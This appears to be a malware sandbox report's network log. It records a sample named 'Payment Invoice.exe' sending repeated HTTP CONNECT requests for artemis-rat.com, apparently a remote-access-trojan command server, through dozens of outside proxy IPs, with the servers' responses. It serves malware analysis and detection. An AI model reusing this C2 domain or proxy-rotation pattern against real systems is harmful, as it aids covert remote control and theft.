                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                242192.168.2.45065045.65.138.489997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.128824949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.473664045 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                243192.168.2.45069572.10.160.90291977076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.128900051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:40.478544950 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                244192.168.2.45069472.10.160.170315717076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.128901005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                245192.168.2.450863104.16.241.204807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.139163017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.293709040 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                246192.168.2.450701190.153.121.241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.141303062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                247192.168.2.450595185.132.242.21280837076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.148375988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                248192.168.2.45051435.154.71.7210807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.148564100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.555237055 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                249192.168.2.450681121.159.146.251807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.150477886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                250192.168.2.45060239.105.5.126807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.151725054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                251192.168.2.45064658.234.116.197807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.152132988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                252192.168.2.45062627.0.234.20610807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.159734011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                253192.168.2.45033751.68.164.77328247076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.161278963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.214148045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.027410984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                254192.168.2.450522103.190.54.14180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.161283016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                255192.168.2.45018336.134.91.8288887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.168261051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.448517084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.186534882 CET324INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.16.1
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 157
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                256192.168.2.450187117.160.250.16399907076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.168272018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.903637886 CET303INHTTP/1.1 400 Bad Request
                                                                Server: openresty
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 154
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                257192.168.2.45078872.10.160.90236857076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.173168898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                258192.168.2.45064051.161.131.84630557076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.177225113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                259192.168.2.45048943.231.22.229807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.179799080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.042347908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                260192.168.2.450840104.131.77.6622337076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.194971085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.729792118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.401776075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.824501038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.511918068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.324091911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.027067900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.526906967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.323822975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                261192.168.2.45070095.164.89.12388887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.200974941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.502367973 CET327INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                262192.168.2.450684120.89.91.22281827076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.201847076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.932917118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.089546919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.167773962 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                263192.168.2.45086767.43.236.20266937076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.205401897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.427814960 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                264192.168.2.449932194.182.187.7831287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.233710051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.555210114 CET28INHTTP/1.1 400 Bad Request


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                265192.168.2.450714192.46.229.1931287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.234323025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.538574934 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                266192.168.2.450708195.177.217.131528587076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.234411955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.917392969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                267192.168.2.45072052.67.10.18331287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.234554052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.562372923 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                268192.168.2.450946162.159.241.5807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.234551907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.395699978 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                269192.168.2.45085772.210.221.19741457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.234996080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                270192.168.2.45087467.43.227.227287237076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.235527992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.625895023 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                271192.168.2.450742152.32.130.117180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.236377954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
